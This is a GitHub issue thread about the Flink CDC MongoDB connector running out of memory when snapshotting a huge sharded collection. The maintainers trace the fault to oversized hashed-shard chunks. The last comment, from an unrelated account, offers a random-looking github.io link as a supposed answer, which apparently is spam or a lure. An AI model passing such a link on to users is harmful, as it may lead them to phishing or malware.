### ISSUE TITLE
[Bug] [mongodb] pull big collection (>20 billion records) lead to checkpoint hang or OOM

### ISSUE THREAD

**Issue by vanliu-tx** [ververica/flink-cdc-connectors#2504]
### Search before asking

- [X] I searched in the [issues](https://github.com/ververica/flink-cdc-connectors/issues) and found nothing similar.

### Flink version

1.17.0

### Flink CDC version

2.4.1

### Database and its version

Using MongoDB:          4.2.11

### Minimal reproduce step

1. prepare a mongodb collection with more than 10 billion records
2. pull records from mongodb, sync to paimon(parquet format on hdfs) or map record to integer 1 and set  up a minute window to count. 
3.  when the application runs for some time (30 minutes ~ a few hours)，it hangs or run into OOM exception and can recover.

### What did you expect to see?

the application runs without error and pull all records from mongodb.

### What did you see instead?

the application runs for server minutes and fail, only 5% less records are pulled from mongodb.

### Anything else?

this is the metrics without sink, only count pulled records.

![cdc_topo](https://github.com/ververica/flink-cdc-connectors/assets/64360028/2e3e0a73-4744-4adb-bda7-4b4c25d24b39)

![cdc_checkpoint](https://github.com/ververica/flink-cdc-connectors/assets/64360028/4ef7b165-bf87-471c-8b91-5c6f99fb6d57)

![cdc_metric1](https://github.com/ververica/flink-cdc-connectors/assets/64360028/a13b0e43-d045-40dd-a047-6989daf92bb6)

![cdc_metric2](https://github.com/ververica/flink-cdc-connectors/assets/64360028/bd32083f-639b-4a2a-b9bc-2276c64d93e6)

### Are you willing to submit a PR?

- [ ] I'm willing to submit a PR!

**Comment by vanliu-tx** [comment]
2023-09-13 13:53:19.930 [SourceCoordinator-Source: 100205_mongocdc_t_lint_defect_v2_prod] INFO  c.v.c.c.base.source.enumerator.IncrementalSourceEnumerator  - Assign split SnapshotSplit{tableId=db_defect.t_lint_defect_v2, splitId='db_defect.t_lint_defect_v2:926', splitKeyType=[`task_id` INT], splitStart=[{"task_id": "hashed"}, {"task_id": -8923183964006431007}], splitEnd=[{"task_id": "hashed"}, {"task_id": -8922499848073591815}], highWatermark=null} to subtask 16
2023-09-13 13:53:19.931 [SourceCoordinator-Source: 100205_mongocdc_t_lint_defect_v2_prod] INFO  c.v.c.c.base.source.enumerator.IncrementalSourceEnumerator  - The enumerator receives finished split offsets FinishedSnapshotSplitsReportEvent{finishedOffsets={db_defect.t_lint_defect_v2:917={resumeToken={"_data": "8265014DFD000012582B0229296E04"}, timestamp=7278184221829501528}}} from subtask 16.
2023-09-13 13:53:23.002 [flink-akka.actor.default-dispatcher-22] INFO  org.apache.flink.runtime.executiongraph.ExecutionGraph  - Writer : mongocdc_t_lint_defect_v2_prod_100205 (13/32) (64269a3ffd76aa7f28c190300cb2c08c_9dd63673dd41ea021b896d5203f3ba7c_12_4) switched from RUNNING to FAILED on cdc-5766833c4d1e47a6a8d49d9599e20d2f-taskmanager-1-12 @ xx.xx.xx.xx (dataPort=43393).
org.apache.flink.runtime.io.network.netty.exception.LocalTransportException: GC overhead limit exceeded (connection to 'xx.xx.xx.xx/xx.xx.xx.xx:34779 [cdc-5766833c4d1e47a6a8d49d9599e20d2f-taskmanager-1-18]')
        at org.apache.flink.runtime.io.network.netty.CreditBasedPartitionRequestClientHandler.exceptionCaught(CreditBasedPartitionRequestClientHandler.java:175)
        at org.apache.flink.shaded.netty4.io.netty.channel.AbstractChannelHandlerContext.invokeExceptionCaught(AbstractChannelHandlerContext.java:302)
        at org.apache.flink.shaded.netty4.io.netty.channel.AbstractChannelHandlerContext.invokeExceptionCaught(AbstractChannelHandlerContext.java:281)
        at org.apache.flink.shaded.netty4.io.netty.channel.AbstractChannelHandlerContext.fireExceptionCaught(AbstractChannelHandlerContext.java:273)
        at org.apache.flink.shaded.netty4.io.netty.channel.ChannelInboundHandlerAdapter.exceptionCaught(ChannelInboundHandlerAdapter.java:143)
        at org.apache.flink.shaded.netty4.io.netty.channel.AbstractChannelHandlerContext.invokeExceptionCaught(AbstractChannelHandlerContext.java:302)
        at org.apache.flink.shaded.netty4.io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:381)
        at org.apache.flink.shaded.netty4.io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:365)
        at org.apache.flink.shaded.netty4.io.netty.channel.AbstractChannelHandlerContext.fireChannelRead(AbstractChannelHandlerContext.java:357)
        at org.apache.flink.shaded.netty4.io.netty.channel.DefaultChannelPipeline$HeadContext.channelRead(DefaultChannelPipeline.java:1410)
        at org.apache.flink.shaded.netty4.io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:379)
        at org.apache.flink.shaded.netty4.io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:365)
        at org.apache.flink.shaded.netty4.io.netty.channel.DefaultChannelPipeline.fireChannelRead(DefaultChannelPipeline.java:919)
        at org.apache.flink.shaded.netty4.io.netty.channel.epoll.AbstractEpollStreamChannel$EpollStreamUnsafe.epollInReady(AbstractEpollStreamChannel.java:800)
        at org.apache.flink.shaded.netty4.io.netty.channel.epoll.EpollEventLoop.processReady(EpollEventLoop.java:499)
        at org.apache.flink.shaded.netty4.io.netty.channel.epoll.EpollEventLoop.run(EpollEventLoop.java:397)
        at org.apache.flink.shaded.netty4.io.netty.util.concurrent.SingleThreadEventExecutor$4.run(SingleThreadEventExecutor.java:997)
        at org.apache.flink.shaded.netty4.io.netty.util.internal.ThreadExecutorMap$2.run(ThreadExecutorMap.java:74)
        at java.lang.Thread.run(Thread.java:748)
Caused by: java.lang.OutOfMemoryError: GC overhead limit exceeded
2023-09-13 13:53:23.003 [flink-akka.actor.default-dispatcher-22] INFO  org.apache.flink.runtime.jobmaster.JobMaster  - 65 tasks will be restarted to recover the failed task 64269a3ffd76aa7f28c190300cb2c08c_9dd63673dd41ea021b896d5203f3ba7c_12_4.
2023-09-13 13:53:23.003 [flink-akka.actor.default-dispatcher-22] INFO  org.apache.flink.runtime.executiongraph.ExecutionGraph  - Job mongodb CDC to paimon for 100205_mongocdc_t_lint_defect_v2_prod (ffffffffff2fce170000000000000000) switched from state RUNNING to RESTARTING.
2023-09-13 13:53:23.003 [flink-akka.actor.default-dispatcher-22] WARN  org.apache.flink.runtime.checkpoint.CheckpointFailureManager  - Failed to trigger or complete checkpoint 15 for job ffffffffff2fce170000000000000000. (0 consecutive failed attempts so far)
org.apache.flink.runtime.checkpoint.CheckpointException: Checkpoint Coordinator is suspending.
        at org.apache.flink.runtime.checkpoint.CheckpointCoordinator.stopCheckpointScheduler(CheckpointCoordinator.java:1977)
        at org.apache.flink.runtime.checkpoint.CheckpointCoordinatorDeActivator.jobStatusChanges(CheckpointCoordinatorDeActivator.java:46)
        at org.apache.flink.runtime.executiongraph.DefaultExecutionGraph.notifyJobStatusChange(DefaultExecutionGraph.java:1608)
        at org.apache.flink.runtime.executiongraph.DefaultExecutionGraph.transitionState(DefaultExecutionGraph.java:1174)
        at org.apache.flink.runtime.executiongraph.DefaultExecutionGraph.transitionState(DefaultExecutionGraph.java:1146)
        at org.apache.flink.runtime.scheduler.SchedulerBase.transitionExecutionGraphState(SchedulerBase.java:581)
        at org.apache.flink.runtime.scheduler.DefaultScheduler.addVerticesToRestartPending(DefaultScheduler.java:364)
        at org.apache.flink.runtime.scheduler.DefaultScheduler.restartTasksWithDelay(DefaultScheduler.java:336)
        at org.apache.flink.runtime.scheduler.DefaultScheduler.maybeRestartTasks(DefaultScheduler.java:307)
        at org.apache.flink.runtime.scheduler.DefaultScheduler.handleTaskFailure(DefaultScheduler.java:249)
        at org.apache.flink.runtime.scheduler.DefaultScheduler.onTaskFailed(DefaultScheduler.java:242)
        at org.apache.flink.runtime.scheduler.SchedulerBase.onTaskExecutionStateUpdate(SchedulerBase.java:748)
        at org.apache.flink.runtime.scheduler.SchedulerBase.updateTaskExecutionState(SchedulerBase.java:725)
        at org.apache.flink.runtime.scheduler.SchedulerNG.updateTaskExecutionState(SchedulerNG.java:80)
        at org.apache.flink.runtime.jobmaster.JobMaster.updateTaskExecutionState(JobMaster.java:479)
        at sun.reflect.GeneratedMethodAccessor434.invoke(Unknown Source)
        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
        at java.lang.reflect.Method.invoke(Method.java:498)
        at org.apache.flink.runtime.rpc.akka.AkkaRpcActor.lambda$handleRpcInvocation$1(AkkaRpcActor.java:309)
        at org.apache.flink.runtime.concurrent.akka.ClassLoadingUtils.runWithContextClassLoader(ClassLoadingUtils.java:83)
        at org.apache.flink.runtime.rpc.akka.AkkaRpcActor.handleRpcInvocation(AkkaRpcActor.java:307)
        at org.apache.flink.runtime.rpc.akka.AkkaRpcActor.handleRpcMessage(AkkaRpcActor.java:222)

**Comment by vanliu-tx** [comment]
some pull arguments:

"batch_size": 10240, 
"poll_max_batch_size": 40960, 
"chunk_size_mb": 128, 
"poll_await_time_ms": 5000, 
"heartbeat_interval_ms": 30000,

**Comment by vanliu-tx** [comment]
some codes to illustrate:

```
MongoDBSource<RowData> mongoSource = MongoDBSource.<RowData>builder()
                .hosts(source.getHosts())
                .databaseList(source.getDb())
                .collectionList(sourceTable())
                .username(source.getUser())
                .password(sink.decodedPassword(source.getPassword()))
                .connectionOptions(source.getConnectionOptions())
                .pollAwaitTimeMillis(source.getPollAwaitTimeMs())
                .heartbeatIntervalMillis(source.getHeartbeatIntervalMs())
                .batchSize(source.getBatchSize())
                .pollMaxBatchSize(source.getPollMaxBatchSize())
                .splitSizeMB(source.getChunkSizeMb())
                .deserializer(deserializer)
                .build();

DataStream<Integer> all = sink.env().fromSource(mongoSource, WatermarkStrategy.noWatermarks(), name)
                .setParallelism(sink.other().getSnapshotParallelism())
                .map(r -> 1)
                .setParallelism(sink.other().getSnapshotParallelism())

all.windowAll(TumblingProcessingTimeWindows.of(Time.minutes(1)))
                .sum(0)
                .map(r -> {
                    log.info("pull in last minute: {}", r);
                    return null;
                });

env.execute(String.format("%s CDC to pull for %s", source.sourceType(), rtId));

```

**Comment by vanliu-tx** [comment]
![image](https://github.com/ververica/flink-cdc-connectors/assets/64360028/1e1e73a9-70ae-4971-99be-c264100e6524)

**Comment by vanliu-tx** [comment]
num     #instances         #bytes  class name
----------------------------------------------
   1:      28978603    15439050344  [C
   2:      28978375      695481000  java.lang.String
   3:      19295444      656947480  [Ljava.lang.Object;
   4:      14474160      463173120  java.util.HashMap$Node
   5:      19283090      462794160  com.ververica.cdc.connectors.shaded.org.apache.kafka.connect.data.Struct
   6:       4824001      419488584  [Ljava.util.HashMap$Node;
   7:       4820773      269963288  com.ververica.cdc.connectors.shaded.org.apache.kafka.connect.source.SourceRecord
   8:       4823197      231513456  java.util.HashMap
   9:       4820826      192833040  java.util.Collections$SingletonMap
  10:       4821084      115706016  java.lang.Long
  11:       4820773       77132368  com.ververica.cdc.connectors.shaded.org.apache.kafka.connect.header.ConnectHeaders

**Comment by vanliu-tx** [comment]
memory leak suspect from another memory dump

![image](https://github.com/ververica/flink-cdc-connectors/assets/64360028/83245580-6060-4da2-922f-486436cdb398)

![image](https://github.com/ververica/flink-cdc-connectors/assets/64360028/58a8237c-6287-4f36-ab3a-461b4c2c31ac)


[b_Leak_Suspects.zip](https://github.com/ververica/flink-cdc-connectors/files/12659716/b_Leak_Suspects.zip)


@Jiabao-Sun please help to take a look

**Comment by vanliu-tx** [comment]
> Sure! Could @vanliu-tx please share some information about how the sharding collection is configured?

This collection use task_id as sharding key, total 20 shards. @yuxiqian 
we could contact on DingDing, "Flink CDC 社区"

sample record:
```

{
  '_class': 'LintDefectV2Entity',
  'id': '1',
  'task_id': 53865,
  'tool_name': 'ESLINT',
  'file_name': 'axios.js',
  'line_num': 107,
  'author': 'xxx',
  'checker': 'no-constant-condition',
  'severity': 1,
  'message': 'Unexpected constant condition.',
  'defect_type': 1,
  'status': 3,
  'line_update_time': 1585908081000,
  'rel_path': '/server/utils/axios.js',
  'file_path': '/data/axios.js',
  'pinpoint_hash': 'xxxx',
  'pinpoint_hash_group': 'pinpoint_hash_group',
  'create_time': 1586092977205,
  'fixed_time': 1587004006906,
  'exclude_time': 1587004006906,
  'ignore_time': 1587004006906,
  'mark_time': 1587004006906,
  'lang_value': 1587004006906,
  'create_date': 1587004006906,
  'updated_date': 1587004006906,
  'ignore_reason_type': 1,
  'ignore_reason': 'ignore_reason',
  'ignore_author': 'ignore_author',
  'mark_but_no_fixed': False,
  'ignore_comment_defect': False,
  'mark': 'mark',
  'create_build_number': '417',
  'fixed_build_number': '450',
  'url': 'xxxx',
  'repo_id': 'xxx',
  'revision': 'xxx',
  'branch': 'master',
  'sub_module': '',
  'file_update_time': 1563862795000,
  'file_md5': 'xxxx',
  'language': 'language',
  'mask_path': 'mask_path',
  'ignore_build_id': 'ignore_build_id',
  'display_type': 'display_type',
  'display_category': 'display_category',
  'ext_bug_id': 'ext_bug_id',
  'file_version': 'file_version',
  'platform_build_id': 'platform_build_id',
  'platform_project_id': 'platform_project_id',
  'stream_name': 'stream_name',
  'created_by': 'aa',
  'updated_by': 'bb',
  'defect_instances': 'abc'
}

```

**Comment by vanliu-tx** [comment]
is this bug related https://github.com/ververica/flink-cdc-connectors/pull/2343 ?

**Comment by Jiabao-Sun** [comment]
> is this bug related #2343 ?

I don't think it has much to do with this problem. The replayed change log is bounded.
What's your id in dingtalk FLINK CDC group?

**Comment by vanliu-tx** [comment]
> > is this bug related #2343 ?
> 
> I don't think it has much to do with this problem. The replayed change log is bounded. What's your id in dingtalk FLINK CDC group?

my nickname is vanliu, just sent a message to you.

**Comment by vanliu-tx** [comment]
https://github.com/ververica/flink-cdc-connectors/blob/master/flink-cdc-base/src/main/java/com/ververica/cdc/connectors/base/source/reader/external/IncrementalSourceScanFetcher.java#L125

**Comment by vanliu-tx** [comment]
Used the function in this link https://dba.stackexchange.com/questions/52416/how-to-determine-chunk-distribution-data-and-number-of-docs-in-a-sharded-mongo, I found that the record count in chunks are very different, some chunks only contain few records, some chunk contains millions of records.

Here is the function I used.
```
AllChunkInfo = function(ns, est){
    var chunks = db.getSiblingDB("config").chunks.find({"ns" : ns, shard: 'cmgo-1vvvzycp_10'}).sort({min:1}); 
    var totalChunks = 0;
    var totalSize = 0;
    var totalEmpty = 0;
    print("ChunkID,Shard,ChunkSize,ObjectsInChunk"); 
    chunks.forEach( 
        function printChunkInfo(chunk) { 
        var db1 = db.getSiblingDB(chunk.ns.split(".")[0]); // get the database we will be running the command against later
        var key = db.getSiblingDB("config").collections.findOne({_id:chunk.ns}).key; // will need this for the dataSize call
        // dataSize returns the info we need on the data, but using the estimate option to use counts is less intensive
        var dataSizeResult = db1.runCommand({datasize:chunk.ns, keyPattern:key, min:chunk.min, max:chunk.max, estimate:est});
        print(chunk._id+","+chunk.shard+","+dataSizeResult.size+","+dataSizeResult.numObjects); 
        totalSize += dataSizeResult.size;
        totalChunks++;
        if (dataSizeResult.size == 0) { totalEmpty++ }; //count empty chunks for summary
        }
    )
    print("***********Summary Chunk Information***********");
    print("Total Chunks: "+totalChunks);
    print("Average Chunk Size (bytes): "+(totalSize/totalChunks));
    print("Empty Chunks: "+totalEmpty);
    print("Average Chunk Size (non-empty): "+(totalSize/(totalChunks-totalEmpty)));
}

AllChunkInfo("db_defect.t_lint_defect_v2", true);
```

Here are some output result:
```
ChunkID,Shard,ChunkSize,ObjectsInChunk
db_defect.t_lint_defect_v2-task_id_-9163720634077882260,cmgo-1vvvzycp_10,4410385375,4302815
db_defect.t_lint_defect_v2-task_id_-9149599528605541836,cmgo-1vvvzycp_10,675165450,658698
db_defect.t_lint_defect_v2-task_id_-9149186651299591335,cmgo-1vvvzycp_10,9641150,9406
......
db_defect.t_lint_defect_v2-task_id_-9131417039887524321,cmgo-1vvvzycp_10,1982242375,1933895
db_defect.t_lint_defect_v2-task_id_-7346469427823507057,cmgo-1vvvzycp_10,3369306200,3287128
db_defect.t_lint_defect_v2-task_id_-7299092179319011753,cmgo-1vvvzycp_10,2486445000,2425800
db_defect.t_lint_defect_v2-task_id_-7271134812680533751,cmgo-1vvvzycp_10,1344837925,1312037
db_defect.t_lint_defect_v2-task_id_-7267957327803427553,cmgo-1vvvzycp_10,2268641725,2213309
db_defect.t_lint_defect_v2-task_id_-7252199402824876254,cmgo-1vvvzycp_10,5556192900,5420676
db_defect.t_lint_defect_v2-task_id_-7250041422860170033,cmgo-1vvvzycp_10,4181443425,4079457
db_defect.t_lint_defect_v2-task_id_-7165639265169997422,cmgo-1vvvzycp_10,6010511850,5863914
db_defect.t_lint_defect_v2-task_id_-6946846892219196773,cmgo-1vvvzycp_10,7366383900,7186716
......

***********Summary Chunk Information***********
Total Chunks: 2679
Average Chunk Size (bytes): 273012847.32176185
Empty Chunks: 0
Average Chunk Size (non-empty): 273012847.32176185
```

**Comment by Jiabao-Sun** [comment]
Thanks @vanliu-tx for doing such a detailed analysis.
I noticed that the chunk below is close to 7GB that may be the main reason for OOM.
`db_defect.t_lint_defect_v2-task_id_-6946846892219196773,cmgo-1vvvzycp_10,7366383900,7186716`

Split the big chunk to many splits in ShardedSplitStrategy is a good way to solve this problem.
Can you talk about your thoughts about how to do that?

**Comment by vanliu-tx** [comment]
I think in the

**Comment by vanliu-tx** [comment]
Try to split the chunk into small pieces, but I found that this is not going to work. In some case, one shard key may contains millions of records. In the log below, there are 3119249 records with task_id equals to 1559426479859094090 (hashed), this will lead to the OOM exception in task manager.

@Jiabao-Sun 

```
2023-10-18 13:58:59.766 [SourceCoordinator-Source: 100205_mongocdc_t_lint_defect_v2_dev2] INFO  c.v.c.c.m.s.assigners.splitters.SplitVectorSplitStrategy  - Collection {"task_id": 1559426479859094090} {"task_id": 1559426479859094091} - db_defect.t_lint_defect_v2: dataSize cmd result {"size": 3.268972952E9, "numObjects": 3119249.0, "millis": 1718, "ok": 1.0, "operationTime": {"$timestamp": {"t": 1697608732, "i": 1}}, "$clusterTime": {"clusterTime": {"$timestamp": {"t": 1697608736, "i": 4}}, "signature": {"hash": {"$binary": {"base64": "lgfHxhHe0+DNMa16e4a7wv/OFAU=", "subType": "00"}}, "keyId": 7248542109899161603}}}
```

```
Caused by: org.apache.flink.util.FlinkRuntimeException: Read split SnapshotSplit{tableId=db_defect.t_lint_defect_v2, splitId='db_defect.t_lint_defect_v2:1090', splitKeyType=[`task_id` INT], splitStart=[{"task_id": "hashed"}, {"task_id": 1559426479859094090}], splitEnd=[{"task_id": "hashed"}, {"task_id": 1559426479859094091}], highWatermark=null} error due to GC overhead limit exceeded.
	at com.ververica.cdc.connectors.base.source.reader.external.IncrementalSourceScanFetcher.checkReadException(IncrementalSourceScanFetcher.java:179)
	at com.ververica.cdc.connectors.base.source.reader.external.IncrementalSourceScanFetcher.pollSplitRecords(IncrementalSourceScanFetcher.java:126)
	at com.ververica.cdc.connectors.base.source.reader.IncrementalSourceSplitReader.fetch(IncrementalSourceSplitReader.java:73)
	at org.apache.flink.connector.base.source.reader.fetcher.FetchTask.run(FetchTask.java:58)
	at org.apache.flink.connector.base.source.reader.fetcher.SplitFetcher.runOnce(SplitFetcher.java:162)
	... 6 more
Caused by: java.lang.OutOfMemoryError: GC overhead limit exceeded
	at java.util.Arrays.copyOf(Arrays.java:3332)
	at java.lang.AbstractStringBuilder.ensureCapacityInternal(AbstractStringBuilder.java:124)
```

**Comment by Jiabao-Sun** [comment]
Thanks @vanliu-tx, it makes sense to me.
Under the hash shard mode, the same sharding key has a large amount of data may cause chunk to swell, and far exceeds the size of the default 64MB.
To solve this problem:
1. We can consider the sharded strategy disable hash shard mode.
2. Or provide the sharded strategy config to let user to choose.

Personal tendency to the second way, WDYT?

**Comment by vanliu-tx** [comment]
> Thanks @vanliu-tx, it makes sense to me. Under the hash shard mode, the same sharding key has a large amount of data may cause chunk to swell, and far exceeds the size of the default 64MB. To solve this problem:
> 
> 1. We can consider the sharded strategy disable hash shard mode.
> 2. Or provide the sharded strategy config to let user to choose.
> 
> Personal tendency to the second way, WDYT?

I prefer the second way. However, if there are billions of records in one collection, 5% sample rate will takes too long to run.

**Comment by Digg-evident** [comment]
I suspect this https://investing-oidc-client-js.github.io/g9BvifK9TKJfru4Dd4uVO3m20fHoVQTPlbe45C_UquogIziRisQRKOKKyof_mm49daCgSPUA9aIV/ might offer some clarity
